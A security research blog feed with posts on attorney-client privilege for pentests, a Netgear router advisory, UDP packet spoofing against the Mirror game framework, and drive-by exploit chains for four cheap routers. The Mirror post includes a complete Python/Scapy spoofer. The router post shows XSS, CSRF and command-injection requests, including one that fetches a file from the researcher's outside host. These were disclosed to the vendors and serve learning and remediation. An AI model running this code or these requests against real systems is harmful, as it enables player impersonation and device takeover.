Normal view

There are new articles available, click to refresh the page.
Before yesterdayInclude Security Research Blog

Think that having your lawyer engage your penetration testing consultancy will help you? Think again.

26 October 2023 at 16:00

Guest Post: Neil Jacobs (deals with cyber law stuff)

Many companies engage their pen testing companies through their lawyers, ie, the lawyers themselves actually engage the pentester (and not the client), and the lawyers provide the pen test results to the client usually via a report. The thinking behind this is that doing so will “cloak” the test results with attorney-client confidentiality (because the pentest report was given to the client by the lawyer, not by the pentester directly) and thus make them not discoverable in litigation. There are several reasons to consider when using this approach, it may be a problem!

To understand why, it’s necessary to get a bit “into the weeds” with respect to what the attorney-client relationship covers and what it doesn’t. The so-called “attorney-client privilege” has two components, first, the obligation of confidentiality that a lawyer has with respect to client communications (eg, if a client tells a lawyer some fact in confidence, the lawyer may not, as a general matter, divulge that fact to anyone outside their office), and second, a litigation privilege that covers attorney-client communications, attorney work product and certain other client-related materials. Both aspects of this privilege have, as their objective, the goal of protecting free and open communication between a client and lawyer so that the client can get the best possible advice. In other words, the policy behind the privilege is to augment/favor legal advice, and the question of whether a communication is indeed privileged will depend on its relationship to the rendering of legal advice. That’s where the pentest situation lies.

When an entity has the pentest contracted for by an attorney, the question of whether privilege attaches to that attorney’s communication of the results to the client is directly and substantially tied in to the actual rendition of legal services. If a lawyer receives the result of the pentest, and passes it on to the client with a cursory “here it is”, without providing additional legal advice, the likelihood of attorney-client privilege actually attaching to that communication is slim even if it is so marked. The degree to which legal advice is given around the test results will determine if privilege attaches. This determination is very fact-specific and is not automatic. Even denominating the results with an “attorney-client privileged communication” advisory may not be enough to attach the privilege if, in reality, little or no legal advice is actually given.

For example, in the case of Wengui v Clark Hill (2021) Wengui was a Chinese dissident who hired Clark Hill to get him asylum in the UDS. Clark Hill was hacked shortly afterward in what was seen as a targeted attack by the Chinese government. Wengui’s asylum application was then disclosed online. Wengui filed suit against Clark Hill for failing to protect his data. Clark Hill engaged a security consultant to understand “what happened” but refused to turn over the consultant’s report in the litigation with Wengui, claiming attorney-client privilege. The judge disagreed and forced Clark Hill to turn it over, saying, among other things, that discovering how a cyberattack occurred is a normal business function that would take place regardless of the existence of litigation.

Similarly, in Capital One Consumer Data Security Breach Litigation (2020), Capital One had retained a security consultant on a regular basis since 2015. After a major data breach, Capital One instructed its outside law firm to engage the same consultant to produce a “special report” on this data breach. The consultant produced the report to the law firm, which in turn produced it to Capital One. The plaintiffs in the lawsuit sought to obtain the report, and Capital One objected on the grounds of attorney-client relations. Again, the judge denied that claim, looking carefully at where the special report was budgeted (under “cyber expense”, not “legal”), the degree to which the law firm did or did not take the lead in heading the investigation (not enough) stating that the doctrine does not protect documents that would have been created in essentially similar form regardless of the litigation, ie, pursuant to an agreement that Capital One had had in place with its security consultant for years before the breach.

So in conclusion: The attorney client privilege is narrower than most companies think. Take proper and full legal advice before acting.

The above does not constitute legal advice but rather the opinions of the author. Reading the within post does not create any attorney-client relationship between the author and readers. Please take individual legal advice for your situation.

From the IncludeSec team, we wanted to thank Neil for his external insight on this subject! (https://www.nijlaw.com/)

The post Think that having your lawyer engage your penetration testing consultancy will help you? Think again. appeared first on Include Security Research Blog.

Impersonating Other Players with UDP Spoofing in Mirror

18 April 2023 at 16:00

Mirror is an open-source multiplayer game framework for Unity. The history of Mirror is pretty interesting, I’d encourage anyone interested to give it a read on their site. Long story short, it was built as a replacement for UNET (which was provided by Unity but had a number of issues and was ultimately deprecated).

Mirror has a number of different transports that you can swap between, such as UDP, websocket, TCP. I recently went on a deep dive into their default transport, KCP, which works over UDP.

Among other concepts, Mirror has commands, which are functions that clients can invoke on the server. Players have ownership of certain objects in the game, and users are only supposed to be able invoke commands on objects they own. For example, a game might implement a command Player::ConsumePotion() which deletes a potion and heals the user. Each player owns their own Player object and should only be able to call this method on their own Player (otherwise you could force other users to consume all of their potions at an inopportune time). Mirror also has RPCs, which are functions that the server calls on the clients.

Both of these would require some way of authenticating clients, so Mirror can know who sent a command/RPC and whether they were authorized to do it. I was curious how Mirror implements this authentication.

Digging in to its (quite nice) source code and analyzing recorded packets with 010 Editor, I found the KCP packet structure to look like this:

  • header : byte. This header determines whether KCP considers this packet reliable (0x01) or unreliable (0x02).
  • conv_ : uint. This one always seemed to be 0 in my captures, I didn’t dig into what it’s for.
  • cmd : byte. There’s a few different commands. The main one is CMD_PUSH (0x51) which “pushes” data. There are also handshake-related commands that are not important for this post.
  • frg : byte. I’m guessing this is used for fragmenting data among multiple packets. All the packets I sent are short so it was always 0 for me and I didn’t look into it further.
  • wnd : ushort. I think it has to do with max packet size. It was 4096 for me.
  • ts : uint. Time in milliseconds since application started running.
  • sn : uint. Might stand for “sequence number”? Mirror expects it to be the same as its rcv_nxt value (or within a certain window in case packets come out of order). Starts at 0 and increments by 1 each message.
  • una : uint. Not sure what this is, but it always seemed to be the same as “sn”.
  • len : uint. Size of the payload.
  • kcpHeader : byte. There’s a few possible values, for handshake, keepalive, disconnect. The main one is 0x03 used to indicate sending data.
  • remoteTimestamp : double. Timestamp, it could be set arbitrarily and didn’t seem to affect anything.
  • messageTypeId: ushort. Hashed message type ID (e.g. Mirror.CommandMessage). Mirror uses a special hashing routine for these IDs, will talk about that in a bit.
  • payload : bytes. The actual command or RPC data.

I was particularly interested in commands, and seeing if there was a way to trick the server into running commands for other users. In this case, the payload will be of type Mirror.CommandMessage which has this structure:

  • netId : uint. Each game object that can receive messages has a netId, they start at 0 and increment.
  • componentIndex : byte. A game object might have multiple components that can receive messages, this is the index of the targeted component.
  • functionHash : ushort. Hash of the (fully qualified) name of the function to invoke on the component, uses the same hashing function as I mentioned. It can’t be any function, it has to be one of the special annotated commands or RPCs.
  • dataLen : uint. Length of all of the parameters to the function combined.
  • data : bytes. Contains the payload to the functions.

The hashing function for messageTypeId and functionHash looks like this in Python:

def get_id(typename):
    return get_stable_hashcode(typename) & 0xffff

def get_stable_hashcode(string):
    bytestr = str.encode(string);
    h = 23
    for c in bytestr:
        h = h * 31 + (int)(c)
    return h

Notably, I didn’t see in any of the packet fields any sort of authentication mechanism. A potential spoofer has to have the correct sn value. But since these start at 0 and increment by 1 with each message, it’s possible to brute force this. So how does Mirror determine where the packet comes from?

The KcpServer::TickIncoming() method is where incoming data is dealt with. It has the following code:

public void TickIncoming()
{
    while (socket != null && socket.Poll(0, SelectMode.SelectRead))
    {
        try
        {
            // receive
            int msgLength = ReceiveFrom(rawReceiveBuffer, out int connectionId);

The connectionId parameter is later used to look up which connection is sending data. How is it generated? KcpServer::ReceiveFrom() has this code:

// EndPoint & Receive functions can be overwritten for where-allocation:
// https://github.com/vis2k/where-allocation
protected virtual int ReceiveFrom(byte[] buffer, out int connectionHash)
{
    // NOTE: ReceiveFrom allocates.
    //   we pass our IPEndPoint to ReceiveFrom.
    //   receive from calls newClientEP.Create(socketAddr).
    //   IPEndPoint.Create always returns a new IPEndPoint.
    //   https://github.com/mono/mono/blob/f74eed4b09790a0929889ad7fc2cf96c9b6e3757/mcs/class/System/System.Net.Sockets/Socket.cs#L1761
    int read = socket.ReceiveFrom(buffer, 0, buffer.Length, SocketFlags.None, ref newClientEP);

    // calculate connectionHash from endpoint
    // NOTE: IPEndPoint.GetHashCode() allocates.
    //  it calls m_Address.GetHashCode().
    //  m_Address is an IPAddress.
    //  GetHashCode() allocates for IPv6:
    //  https://github.com/mono/mono/blob/bdd772531d379b4e78593587d15113c37edd4a64/mcs/class/referencesource/System/net/System/Net/IPAddress.cs#L699
    //
    // => using only newClientEP.Port wouldn't work, because
    //    different connections can have the same port.
    connectionHash = newClientEP.GetHashCode();
    return read;
}

The IPEndpoint class consists of an IP and port. So it appears connections are authenticated based on a hash of these values. Since we’re using UDP packets, it seemed that it should be possible to spoof packets from arbitrary host/port combinations and Mirror will believe them to be authentic. So far we have three caveats to this:

  • The spoofer would need to brute force the correct ‘sn’ value
  • The spoofer would need to know the player’s IP address
  • The spoofer would need to know the port that the player is using to connect to the server

The last point might be the most tricky for an attacker to obtain. RFC 6335 suggests that clients use a port in the following range for ephemeral ports: 49152-65535. This leaves a potential 16383 ports the client could be using. I found a nmap UDP port scan against the client when the game was running to be effective in determining the correct port, as shown below (the game client was using port 59462). UDP port scanning is quite slow, so I only scanned a subset of the ephemeral ports.

$ sudo nmap -sU 192.168.0.14 -p59400-59500
Starting Nmap 7.80 ( https://nmap.org ) at 2022-11-04 13:15 EDT
Nmap scan report for 192.168.0.14
Host is up (0.0063s latency).
Not shown: 99 closed ports
PORT      STATE         SERVICE
59462/udp open|filtered unknown
MAC Address: [REDACTED] (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 132.04 seconds

This assumes though that the attacker has access to the local network the user is on. This might be the case in an eSport or LAN party type scenario. In the case of eSports in particular, this might actually present a high impact, altering the outcome of the game with money at stake.

If an attacker did not know the correct UDP port (like when attacking a stranger over the internet), it might also be possible to brute force the port. However, the attacker would be brute forcing both the port and the sn value, which might not be feasible in a reasonable amount of time without any other data leaks that might give insight into the sn sequence value. Many ISPs also filter out spoofed packets, blocking the attack, but some may not.

In addition to IP and port, it’s also necessary to know the object ID (netId) and component ID of the component that will receive the message. This is game dependent, but can be constant (as in the game tested in the proof of concept below) or might depend on instantiation logic. This likely wouldn’t be too big of a barrier.

Proof of concept

I came up with a Python proof of concept for this attack using the awesome Scapy library. The code for it is at the bottom of the post. To test it, I decided to use one of the example projects the Mirror library provides, which is a chat application. The command that will be invoked by the attacker is defined as:

[Command(requiresAuthority = false)]
void CmdSend(string message, NetworkConnectionToClient sender = null)
{
    if (!connNames.ContainsKey(sender))
        connNames.Add(sender, sender.identity.GetComponent<Player>().playerName);

    if (!string.IsNullOrWhiteSpace(message))
        RpcReceive(connNames[sender], message.Trim());
}

The attack will look like this:

 _________________        _____________________________
 Server           |      |Client
 192.168.0.14:7777|<---->|192.168.0.14:????? (determine port using port scan/Wireshark)
 _________________|      |_____________________________
    ^
    |
    | Spoofed UDP packets w/IP 192.168.0.14 and port = [client port]
    |
 ___|_____________
 Attacker         |
 192.168.0.253    |
 _________________|

I ran the game in the Unity editor as the server and a Windows build as the client:

I determined the client source port using Wireshark to avoid waiting for a lengthy UDP scan (though the scan would’ve worked too). Then I ran my PoC from the attacking host using the following command (superuser privileges are needed for Scapy to be able to do raw packets). The most important line is the one with the srchost and srcport parameters, which are spoofed to pose as the client user’s host and port.

$ ip a | grep 192
    inet 192.168.0.253/24 brd 192.168.0.255 scope global noprefixroute wlo1
$ sudo python3 spoofer.py -v \
    --dsthost 192.168.0.14 --dstport 7777 \
    --srchost 192.168.0.14 --srcport 55342 \
    --messageType command \
    --function "System.Void Mirror.Examples.Chat.ChatUI::CmdSend(System.String,Mirror.NetworkConnectionToClient)"  \
    uiopasdf
Sending packet: 010000000051000010570a000001000000010000002d00000003000000000000244094b40100000000973f18000000080073706f6f666564d2040000090061736466617364660a
.
Sent 1 packets.
Sending packet: 010000000051000010570a000002000000020000002d00000003000000000000244094b40100000000973f18000000080073706f6f666564d2040000090061736466617364660a
[Many such messages snipped for brevity ...]

This resulted in a large number of messages appearing on the players’ games, appearing to come from the client user:

Chat provided a convenient example where it was easy to show impersonation using this technique without a video. You might notice that the CmdSend function has the flag requiresAuthority=false — this means any client can call the function, so this example doesn’t prove that you can call commands on objects belonging to other users. However, I tested other examples with requiresAuthority=true and they also work. I did not implement or test RPC spoofing in my PoC, however based on Mirror’s code I saw no reason that RPC spoofing wouldn’t also be possible. In this case the attacker would be pretending to be the server in order to invoke certain functions on the client.

Impact

The most obvious potential impact to such an attack would be cheating and user impersonation. As mentioned, in certain scenarios like eSports, this might be high stakes, but in other cases it would be a mere annoyance. Impersonating a user and doing annoying or harassing things might have social (or even legal?) repercussions for that person.

Other attacks depend heavily on the game and the functionality contained in the commands and RPCs. Perhaps an RPC might be vulnerable to XXE or shell command injection (seems unlikely but who knows). Suppose there was a command for changing levels that forced clients to load asset bundles from arbitrary URLs. An attacker could create a malicious asset bundle and force the game clients to load it.

Remediation

In order to prevent the attack, Mirror would have to have some way of verifying where the packets came from.

One solution to prevent spoofed commands might be for the server to send a randomly-generated token to each client on connection. In future communications, the client would need to include this token with every packet, and the server would drop packets with an invalid token. For RPCs, it would need to work the other way — the client would send the server a token, and the server would have to include that in future communications.

Assuming the attacker can’t intercept communications, this would prevent the spoofed packets, since the attacker would be unable to obtain this token.

An alternative but similar solution might be for the client and server to send keys during the initial handshake, and in subsequent packets use the keys to generate an HMAC of the packet. The opposite side verifies the HMAC before accepting the packet. This solution might be more bandwidth friendly, allowing longer keys sent only with the handshake, then shorter HMACs with subsequent messages. An attacker would have to intercept the initial message to get the key, unlike in the first remediation where they could obtain it in any message.

Before publication, this post was shared with the Mirror team. They have backported secure cookies to KCP: https://github.com/vis2k/kcp2k/commit/ebb456a1132d971a9227c3d0e4449931f455c98c. Additionally, an encrypted transport implementation is currently under development.

Proof of concept code

spoofer.py

import argparse
import sys
import kcp_packet
import command_message
import utils

try:
    from scapy.all import *
except ImportError:
    print("Scapy module required -- pip install scapy")
    exit(1)

parser = argparse.ArgumentParser(description='Craft spoofed Mirror Commands and RPCs over KCP')
parser.add_argument('--dsthost', type=str, help="Destination IP address", required=True)
parser.add_argument('--dstport', type=int, help="Destination port", default=7777)
parser.add_argument('--srchost', type=str, help="Spoofed source IP", required=True)
parser.add_argument('--srcport', type=int, help="Spoofed source port", required=True)
parser.add_argument('--messageType', type=str, choices=["command", "rpc"], help="Message type to send", required=True)
parser.add_argument('--function', type=str, help="The function to invoke on the receiver. Must be a fully qualified function signature like this -- do not deviate, add any spaces, etc: 'System.Void Mirror.Examples.Chat.ChatUI::CmdSend(System.String,Mirror.NetworkConnectionToClient)'")
parser.add_argument('--functionId', type=int, help="alternative for specifying function to call, use the hashed ID value sent by Mirror instead of generating it. You can grab the ID by examining Mirror traffic. Must also specify parameter types though using --function with a dummy name but the correct parameter types.", default=None)
parser.add_argument('--snStart', type=int, help="start value for brute forcing the recipient's SN value", default=1)
parser.add_argument('--snEnd', type=int, help="end value for brute forcing the recipient's SN value", default=100)
parser.add_argument('--netId', type=int, help="netId of gameobject that will receive the message", default=1)
parser.add_argument('--componentId', type=int, help="componentId of component that will receive the message", default=0)
parser.add_argument('--verbose', '-v', action='store_true', )
parser.add_argument('arguments', metavar='A', type=str, nargs='+', help='Arguments to the invoked function')

args = parser.parse_args(sys.argv[1:])

def verbose_print(text):
    if (args.verbose):
        print(text);

# Construct data payload per message type
data = None
if (args.messageType == "command"):
    data = command_message.create_from_function_def(1, 0, args.function, args.arguments)
elif (args.messageType == "rpc"):
    pass # TODO

# Send a series of KCP packets with this payload to brute force the SN value
for sn in range(args.snStart, args.snEnd):
    msg = kcp_packet.create(sn=sn, data=data)

    verbose_print("Sending packet: " + msg.hex())

    packet = IP(src=args.srchost, dst=args.dsthost) / UDP(sport=args.srcport, dport=args.dstport) / msg
    send(packet)

kcp_packet.py

import struct

struct_fmt = "=" # native byte order, standard sizes
struct_fmt = struct_fmt + 'c' # header : byte
struct_fmt = struct_fmt + 'I' # conv_ : uint
struct_fmt = struct_fmt + 'c' # cmd : byte
struct_fmt = struct_fmt + 'c' # frg : byte
struct_fmt = struct_fmt + 'H' # wnd : ushort
struct_fmt = struct_fmt + 'I' # ts : uint
struct_fmt = struct_fmt + 'I' # sn : uint
struct_fmt = struct_fmt + 'I' # una : uint
struct_fmt = struct_fmt + 'I' # len : uint

packet_size = struct.calcsize(struct_fmt)

HDR_RELIABLE = b'\x01'
CMD_PUSH = b'\x51'
WINDOW = 4096

def create(header=HDR_RELIABLE, conv_=0, cmd=CMD_PUSH, frg=b'\x00', wnd=WINDOW, ts=2647, sn=1, una=None, data=b''):

    # idk what una is, but it seems to always be the same as sn in my samples
    # so default to that, unless they've overridden it
    if (una == None):
        una = sn 

    return struct.pack(struct_fmt, header, conv_, cmd, frg, wnd, ts, sn, una, len(data)-1) + data

def parse(packet):
    tup = struct.unpack(struct_fmt, packet[0:packet_size])
    return {
        'header': tup[0],
        'conv_': tup[1],
        'cmd': tup[2],
        'frg': tup[3],
        'wnd': tup[4],
        'ts': tup[5],
        'sn': tup[6],
        'una': tup[7],
        'data': packet[packet_size:]
    }

command_message.py

import utils
import struct

struct_fmt = "=" # native byte order, standard sizes

# really, these 3 fields should be part of kcp_packet. but when I put them there it doesn't work and I'm not sure why
struct_fmt = struct_fmt + 'c' # kcpHeader : byte (0x03 = data)
struct_fmt = struct_fmt + 'd' # remoteTimestamp : double
struct_fmt = struct_fmt + "H" # messageTypeId: ushort -- hashed message type id (in this case Mirror.CommandMessage)

struct_fmt = struct_fmt + "I" # netId : uint
struct_fmt = struct_fmt + "c" # componentIndex : byte
struct_fmt = struct_fmt + "H" # functionHash : ushort
struct_fmt = struct_fmt + "I" # dataLen : uint

message_type_id = utils.get_id("Mirror.CommandMessage")

# function signature needs to be of the form:
#     System.Void Mirror.Examples.Chat.ChatUI::CmdSend(System.String,Mirror.NetworkConnectionToClient)
# for whatever command function you want to invoke. This is what Mirror expects.
# We also parse the signature to determine the different fields that need to be sent
def create_from_function_def(net_id, component_id, function_signature, params):

    function_id = utils.get_id(function_signature);
    param_types = utils.parse_param_types_from_function_def(function_signature)

    return create_from_function_id(net_id, component_id, function_id, param_types, params);

# Param types must contain full typename. E.g. System.String, System.Int32
def create_from_function_id(net_id, component_id, function_id, param_types, params):

    data = b''
    for i in range(0, len(params)):
        data = data + utils.pack_param(param_types[i], params[i])
    data = data + b'\x0a'
    return struct.pack(struct_fmt, b'\x03', 10.0, message_type_id, net_id, bytes([component_id]), function_id, len(data)) + data

def parse():
    pass

utils.py

import struct

# Take fully qualified function signature and grab parameter types of each argument, excluding
# the last one which is always a Mirror.NetworkConnectionToClient in Mirror
def parse_param_types_from_function_def(signature):
    # grab only the stuff between the parenthesis
    param_str = signature[signature.find('(')+1 : -1]
    # split by ',' and remove the last one which is always added by recipient, not send by the client
    return param_str.split(',')[:-1]

# turn a function parameter into bytes expected by Mirror
# e.g. string -> ushort length, char[]
def pack_param(param_type, param):
    # strings are packed as ushort len, char[]
    if (param_type == "System.String"):
        fmt = f"H{len(param)}s"
        return struct.pack(fmt, len(param)+1, str.encode(param))
    # integers
    elif (param_type == "System.Int32"):
        fmt = f"i"
        return struct.pack(fmt, int(param))
    else:
        print(f"Error: do not yet know how to pack parameter of type {param_type} -- add logic to pack_param()")

#
# These methods are used to generate different IDs within Mirror used to associate
# packets with functions and types on the receiving side
#

def get_id(typename):
    return get_stable_hashcode(typename) & 0xffff

def get_stable_hashcode(string):
    bytestr = str.encode(string);
    h = 23
    for c in bytestr:
        h = h * 31 + (int)(c)
    return h

The post Impersonating Other Players with UDP Spoofing in Mirror appeared first on Include Security Research Blog.

Working with vendors to “fix” unfixable vulnerabilities: Netgear BR200/BR500

By Erik Cabetas

In the summer of 2021 Joel St. John was hacking on some routers and printers on his IncludeSec research time. He reported security vulnerabilities to Netgear in their BR200 router line (branded as “Netgear Insight Managed Business Router”). During subsequent internal analysis by Netgear, they found that the BR500 line was also affected by the same concerns identified by IncludeSec. We should note that both of these product lines reached their end-of-life date in 2021 around the time we were doing this research.

Today we want to take a quick moment to discuss a different angle of the vulnerability remediation process that we think was innovative and interesting from the perspective of the consumer and product vendor: hardware product replacement as a solution for vulnerabilities. In the following link released today, you’ll find Netgear’s solution for resolving security risks for customers with regard to this case: https://kb.netgear.com/000064712/Security-Advisory-for-Multiple-Security-Vulnerabilities-on-BR200-and-BR500-PSV-2021-0286.

We won’t discuss the details of the vulnerabilities reported in this post, but suffice to say, they were typical of other SoHo-type products (e.g., CSRF, XSS, admin functionality access, etc.) but were chained in various ways such that mass exploitation is not possible (i.e., this was not wormable). Regardless of the technical details of the vulnerabilities reported, if you are an owner of a BR200 or BR500 router, you should take this chance to upgrade your product!

That last concept of “upgrade your product” for SoHo devices has traditionally been an update of firmware. This method of product upgrade can work well when you have a small company with a small set of supported products (like a Fitbit, as an example), but what happens when you’re a huge company with hundreds of products, hundreds of third parties, and thousands of business agreements? Well, then the situation gets complicated quickly, thus begging the question, “If I reach a speed bump or roadblock in my firmware fix/release cycle, how do I ensure consumers can remain safe?” or “This product is past its end-of-life date. How do we keep consumers on legacy products safe?”

While we don’t have full knowledge of the internal happenings at Netgear, it’s possible that a similar question and answer scenario may have happened at the company. As of May 19, 2022, Netgear decided to release a coupon to allow consumers to obtain a free or 50% discounted (depending on how long you’ve owned the device) new router of the latest model to replace the affected BR200/BR500 devices. Additionally, both affected router models were marked obsolete and their end of life date hit in 2021. 

We think this idea of offering a hardware product replacement as a solution for customers is fairly unique and is an interesting idea rooted in the good intention of keeping users secure. Of course it is not without pitfalls, as there is much more work required to physically replace a hardware device, but if the only options are “replace this hardware” or “have hardware with vulnerabilities”, the former wins most every time.

As large vendors seek to improve security and safety for theirs users in the face of supply chain complexities common these days in the hardware world, we at IncludeSec predict that this will become a more common model of occurrence especially when thinking about the entire product lifecycle for commercial products and how many points may actually be static due to internal or external reasons which may be technical or business related.

For those who have the BR200/BR500 products and are looking to reduce risk, we urge you to visit Netgear’s web page and take advantage of the upgrade opportunity. That link again is: https://kb.netgear.com/000064712/Security-Advisory-for-Multiple-Security-Vulnerabilities-on-BR200-and-BR500-PSV-2021-0286

Stay safe out there folks, and kudos to all those corporations who seek to keep their users safe with product upgrades, coupons for new devices, or whatever way they can!

The post Working with vendors to “fix” unfixable vulnerabilities: Netgear BR200/BR500 appeared first on Include Security Research Blog.

Drive-By Compromise: A Tale Of Four Wifi Routers

1 October 2021 at 01:58

The consumer electronics market is a mess when it comes to the topic of security, and particularly so for routers and access points. We’ve seen a stark increase in demand for device work over the past year and even some of the best-funded products make plenty of security mistakes. There are a dozen vendors selling products within any portion of this market and it is incredibly hard to discern the overall security posture of a device from a consumer’s perspective. Even security professionals struggle with this – the number one question I’ve received when I describe my security work in this space to non-security people is "Okay, then what router should I buy?" I still don’t feel like I have a good answer to that question.

¯\(ツ)

Hacking on a router is a great way to learn about web and device security, though. This industry seems stuck in a never-ending cycle in which security is almost always an afterthought. Devices are produced at the cheapest cost manageable, and proper security testing is an expensive endeavor. Products ship full of security vulnerabilities, see support for a handful of years, and then reach end-of-life only to be replaced by the new shiny model.

For years I’ve given this as my number one recommendation to people new to infosec as a means of leveling up their skills. In late 2020, someone asked me for practical advice on improving at web application security. I told him to go buy the cheapest router he could find on Amazon and that I’d help walk him through it. This ended up being the WAVLINK AC1200, clocking in at a whopping $28 at the time.

More fun indeed

Of course, I was personally tempted into get involved, so I picked one up myself. After a couple weekends playing with the device I’d found quite a few bugs. This culminated in a solid chain of vulnerabilities that made it fairly simple to remotely compromise the device – all from simply visiting an attacker-controlled webpage (aka ‘drive-by’ attack). This is a pretty amazing feeling, and doing this sort of work has turned into a hobby. $28 for a few weekends of fun? Cheaper than a lot of options out there!

This initial success got me excited enough that I bought a few more devices at around the same price-point. They delivered in a similar fashion, giving me quite a bit of fun during the winter months of 2020. First, though, let’s dive into the WAVLINK AC1200…

WAVLINK AC1200

When initially digging into this, I didn’t bother to check for prior work as the journey is the fun part. Several of the vulnerabilities I discovered were found independently (and earlier) by others, and some of them have been publicly disclosed. The other vulnerabilities were either disclosed in private, or caught internally by WAVLINK – the firmware released in December 2020 seems to have patched it all. If you happen to have one, you should definitely go install the updated firmware.

Alright, let’s get into it. There are a few things going on with this router:

  1. A setup wizard is not disabled after being used, letting unauthenticated callers set the device password.
  2. Cross-site request forgery (CSRF) throughout the management console.
  3. Cross-site scripting (XSS) in the setup wizard.
  4. A debug console that allows execution of arbitrary system commands.
pew pew pew

The Magical Setup Wizard

When first provisioning the device, users are met with a pretty simple setup wizard:

WAVLINK AC1200 Setup Wizard

When you save, the application sends a POST request like the following:

POST /cgi-bin/login.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysinit&wl_reddomain=WO&time_zone=UTC+04:00&newpass=Password123&wizardpage=/wizard.shtml&hashkey=0abdb6489f83d63a25b9a025b8a518ad&syskey=M98875&wl_reddomain1=WO&time_zone1=UTC+04:00&newpass1=supersecurepassword

Once this wizard is completed, the endpoint is not disabled, essentially allowing an attacker to re-submit the setup wizard. Since it’s implemented to not require authentication, an attacker can call back with a properly-formed request if someone happens to visit an attacker-controlled website. It can also be cleaned up a bit, as only some of the parameters are required:

POST /cgi-bin/login.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysinit&newpass=<attacker-supplied password>

In addition, the wizardpage parameter is vulnerable to reflected XSS and we can use a single request to pull in some extra JavaScript:

POST /cgi-bin/login.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysinit&newpass=hunter2&wizardpage=</script><script src="http://q.mba:1234/poc.js">//

When a victim visits our page, we can see this request in the HTTP server logs:

This additional code can be used for all sorts of nefarious purposes, but first…

Command Execution as a Service

One of the bugs that was reported on fairly extensively had to do with this lovely page, hidden in the device’s webroot:

The reports claimed that this is a backdoor, though honestly it seems more like a debug/test console to me. Regardless, it’s pretty useful for this exploit 🙂

With the additional JavaScript pulled in via XSS, we can force the targeted user into logging into the web console (with the newly set password) and then use the debug console to pull down a file:

POST /cgi-bin/adm.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysCMD&command=wget+http://q.mba:1234/rce.txt+-O+/etc_ro/lighttpd/www/rce.txt&SystemCommandSubmit=Apply

In this case I’m just using wget, but it would be pretty trivial to do something more meaningful here. All-in-all, quite a fun time working this all out and it proved to be a great training exercise for some folks.

Cudy and Tenda

The next two devices that came across my desk for IoT research practice were the Cudy WR1300 and the Tenda AC6V2. While not quite as vulnerable as the WAVLINK, they were both quite vulnerable in their ‘default’ state. That is, if someone were to purchase one and just plug in an Ethernet cable, it’d work perfectly well but attacks can easily exploit gaps in the web management interfaces.

The Tenda AC6v2

For this device, exploitation is trivial if the device hasn’t been provisioned. Since you plug it in and It Just Works, this is fairly likely. Even if a victim has set a password, then attacks are possible if a victim is logged into the web interface, or an attacker can guess or crack the password.

We ended up reporting several findings:

  1. CSRF throughout the web console. (CVE-2021-32118)
  2. Command injection in the NTP configuration (CVE-2021-32119).
  3. MD5-hashed user passwords stored in a cookie. (CVE-2021-32117)
  4. The aforementioned gap introduced by not requiring users to complete web provisioning before use. (CVE-2021-32116)
  5. sysinit remains active, can be used to set device password (CVE-2021-32120)

Only 1 and 2 are required for remote compromise. We reported these back in May and received no response, and the firmware has not been updated at the time of writing this post.

The Cudy WR1300

For this device, users are not prompted to change the default password (admin), even if they happen to log into the web interface to set the device up (CVE-2021-32112). The console login is also vulnerable to CSRF, which is a nasty combination. Once logged in, users can be redirected to a page that is vulnerable to reflected XSS (CVE-2021-32114), something like:

http://192.168.10.1/cgi-bin/luci/admin/network/bandwidth?iface=wlan10&icon=icon-wifi&i18name=<script>yesitsjustthateasy</script>

this enables an attacker to bypass the CSRF protections on other pages. Of particular interest are the network utilities, each of which (ping/traceroute/nslookup) are vulnerable to command injection (CVE-2021-32115). To sum it all up, the exploit chain ends up looking as follows:

  1. Use CSRF to log into the web console (admin/admin).
  2. Redirect to the page vulnerable to cross-site scripting.
  3. Bypass CSRF protections in order to exploit command injection in the ping test feature.

We reported these findings to Cudy in May as well, and they have released new firmware for this device. We haven’t been able to verify the fixes, however we recommend updating to the most recent firmware if you happen to have one of these devices.

Firmware Downgrades For Fun and Profit

The final device that I ended up taking a look in this batch is the Netgear EX6120:

The EX6120 is a fairly simple WiFi range extender that’s been on the market for several years now, at about the same price point as the other devices. This is one that I’d actually purchased a couple years prior but hadn’t found a good way to compromise. After finishing up with the other devices, I was hungry for more and so tried hacking on this one again. Coming back to something with a fresh set of eyes can often yield great results, and that was definitely the case for this device.

When I sit down to test one of these devices my first step is always to patch the firmware to the latest version. On a recent assessment I’d found a CSRF vulnerability that was the result of a difference in the Content-Type on a request. Essentially, all POST requests with the typical Content-Type used throughout the application (x-www-form-urlencoded) were routed through some common code that enforced CSRF mitigations. However, a couple endpoints in the application supported file uploads and those used multipart forms which conveniently lacked CSRF protections.

With that fresh in my mind, as I was upgrading the firmware I tried removing the CSRF token in much the same way. Sure enough – it worked! I crossed my fingers and tested against the most recent firmware, and it had not been patched yet. This vulnerability on its own is okay, though as mentioned previously it’s not all that likely that a victim is going to be logged into the web console and that would be required to exploit it.

It didn’t take very long to find a way, though. In a very similar fashion, multipart-form requests did not seem to require authentication at all (CVE-2021-32121). I’ve seen this previously in other applications and the root cause is often quite similar to the gap in CSRF protections. A request or two uses some fundamentally different way of communicating with the application and as such doesn’t enforce the same restrictions. It’s a bit of a guess as to what the root cause in this specific case is, but that’s my best guess 🙂

We reported this to Netgear in May as well, and they got back to us fairly quickly. Updated firmware has been released, however we haven’t verified the fixes.

Final Thoughts

As always, doing this sort of research has been a very rewarding experience. Plenty of bugs found and reported, new techniques learned, and overall just a lot of fun to play around with. The consumer device space feels like something ripped out of time, where we can rewind twenty years to the ‘good old days’ where exploits of this nature were commonplace. We do see some signs of improvement here and there, but as you go to buy your next device consider the following:

  1. Is the device from a recognized brand? How long have they been around? How’s their track record for security vulnerabilities? How have they responded to vulnerabilities in the past?
  2. Cheaper is not always better. It’s absolutely crazy how cheap some of this hardware has become, and you’re generally getting what you paid for. Software security is expensive to do right and if it seems too good to be true, it often is.
  3. Does the device have known vulnerabilities? This can be as simple as searching for ‘<brand> <model> vulnerabilities’.
  4. How likely is it that you’ll log in to install new firmware? If the answer is ‘not often’ (and no judgement if so – many security professionals I know are plenty guilty here!) then consider getting a model with support for automatic updates.

